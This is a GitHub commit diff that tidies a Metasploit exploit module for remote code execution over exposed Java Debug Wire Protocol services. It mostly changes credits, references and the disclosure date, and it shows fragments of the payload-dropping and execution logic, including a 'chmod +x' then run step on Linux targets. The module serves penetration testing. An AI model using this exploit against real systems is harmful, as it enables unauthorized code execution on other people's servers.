Skip to content

Commit 6a78098

Browse files
committed
Do minor cleanup
1 parent caa1e10 commit 6a78098

File tree

1 file changed

+9
-9
lines changed

1 file changed

+9
-9
lines changed

modules/exploits/multi/misc/java_jdwp_debugger.rb

Lines changed: 9 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -68,18 +68,16 @@ class Metasploit3 < Msf::Exploit::Remote
6868
STEP_MIN = 0
6969
THREAD_SLEEPING_STATUS = 2
7070

71-
7271
def initialize
7372
super(
7473
'Name' => 'Java Debug Wire Protocol Remote Code Execution',
7574
'Description' => %q{
7675
This module abuses exposed Java Debug Wire Protocol services in order
77-
to execute arbitrary Java code remotely. It just uses the protocol
76+
to execute arbitrary Java code remotely. It just abuses the protocol
7877
features, since no authentication is required if the service is enabled.
7978
},
8079
'Author' => [
81-
'prdelka', # Vulnerability discovery
82-
'Michael Schierl', # First exploit seen
80+
'Michael Schierl', # Vulnerability discovery / First exploit seen / Msf module help
8381
'Christophe Alladoum', # JDWP Analysis and Exploit
8482
'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module
8583
],
@@ -88,8 +86,8 @@ def initialize
8886
['OSVDB', '96066'],
8987
['EDB', '27179'],
9088
['URL', 'http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html'],
89+
['URL', 'http://seclists.org/nmap-dev/2010/q1/867'],
9190
['URL', 'https://github.com/schierlm/JavaPayload/blob/master/JavaPayload/src/javapayload/builder/JDWPInjector.java'],
92-
['URL', 'http://www.exploit-db.com/papers/27179/'],
9391
['URL', 'https://svn.nmap.org/nmap/scripts/jdwp-exec.nse'],
9492
['URL', 'http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html']
9593
],
@@ -116,7 +114,7 @@ def initialize
116114
],
117115
'DefaultTarget' => 0,
118116
'License' => MSF_LICENSE,
119-
'DisclosureDate' => 'May 29 2014'
117+
'DisclosureDate' => 'Mar 12 2010'
120118
)
121119

122120
register_options(
@@ -892,8 +890,10 @@ def exec_payload(thread_id)
892890
close_file(thread_id, file)
893891

894892
# 5b. When linux arch, give execution permissions to file
895-
cmd = "chmod +x #{payload_exe}"
896-
execute_command(thread_id, cmd) if target['Platform'] == 'linux'
893+
if target['Platform'] == 'linux'
894+
cmd = "chmod +x #{payload_exe}"
895+
execute_command(thread_id, cmd)
896+
end
897897

898898
# 6. Executes the dumped payload
899899
cmd = "#{payload_exe}"
@@ -935,7 +935,7 @@ def exploit
935935

936936
unless parse_event(response, r_id, t_id)
937937
datastore['NUM_RETRIES'].times do |i|
938-
print_status("#{peer} - Received #{i+1} responses that are not a 'step into' event...")
938+
print_status("#{peer} - Received #{i + 1} responses that are not a 'step into' event...")
939939
buf = read_reply
940940
break if parse_event(buf, r_id, t_id)
941941

0 commit comments

Comments
 (0)